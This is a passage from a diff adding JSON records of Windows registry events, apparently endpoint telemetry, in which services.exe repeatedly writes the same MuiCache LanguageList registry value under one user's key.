"timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849640000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": 